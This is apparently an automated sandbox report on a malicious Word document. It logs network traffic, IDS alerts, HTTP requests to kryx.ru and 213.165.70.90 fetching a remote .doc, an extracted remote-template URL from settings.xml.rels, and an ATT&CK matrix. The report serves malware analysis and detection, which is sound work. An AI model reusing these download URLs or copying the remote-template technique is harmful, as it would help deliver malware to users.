Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: winword.exe | Memory has grown: Private usage: 1MB later: 70MB

Networking

Source: Network traffic | Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53977 -> 213.165.70.90:80
Source: Network traffic | Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53975 -> 188.225.72.170:443
Source: Network traffic | Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:53969 -> 188.225.72.170:443
Source: Joe Sandbox View | ASN Name: TIMEWEB-ASRU
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | JA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global traffic | HTTP traffic detected:
  GET /8IJcFB?&bangladesh=abstracted&change HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: kryx.ru
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /346/fusce/givenbestresultswithglorryeyeshappiness________givenbestresultswithglorryeyeshappiness_________givenbestresultswithglorryeyeshappiness.doc?&explanation=puffy&bestseller HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
  Host: 213.165.70.90
Source: unknown | TCP traffic detected without corresponding DNS query: 213.165.70.90
Source: global traffic | DNS traffic detected: DNS query: kryx.ru
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53969
Source: unknown | Network traffic detected: HTTP traffic on port 53971 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53967
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53978
Source: unknown | Network traffic detected: HTTP traffic on port 53967 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53969 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53971
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53975
Source: unknown | Network traffic detected: HTTP traffic on port 53978 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53975 -> 443
Source: unknown | HTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.24:53967 version: TLS 1.2
Source: classification engine | Classification label: mal60.evad.winDOC@2/1@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$_______03M4138.docx.bin.doc
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{30659672-00F9-4237-86B0-75B07A8EE9FD} - OProcSessId.dat
Source: _________03M4138.docx.bin.doc | OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: _________03M4138.docx.bin.doc | Virustotal: Detection: 9%
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: _________03M4138.docx.bin.doc | Initial sample: OLE zip file path = word/_rels/header2.xml.rels
Source: _________03M4138.docx.bin.doc | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: _________03M4138.docx.bin.doc | Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: settings.xml.rels | Extracted files from sample: https://kryx.ru/8ijcfb?&bangladesh=abstracted&change
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
ATT&CK Matrix (one line per tactic; the number preceding a technique is the count badge shown for it):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 11 Windows Management Instrumentation; 3 Exploitation for Client Execution; At; Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 Process Injection; 1 Extra Window Memory Injection; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Extra Window Memory Injection; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 1 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 2 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.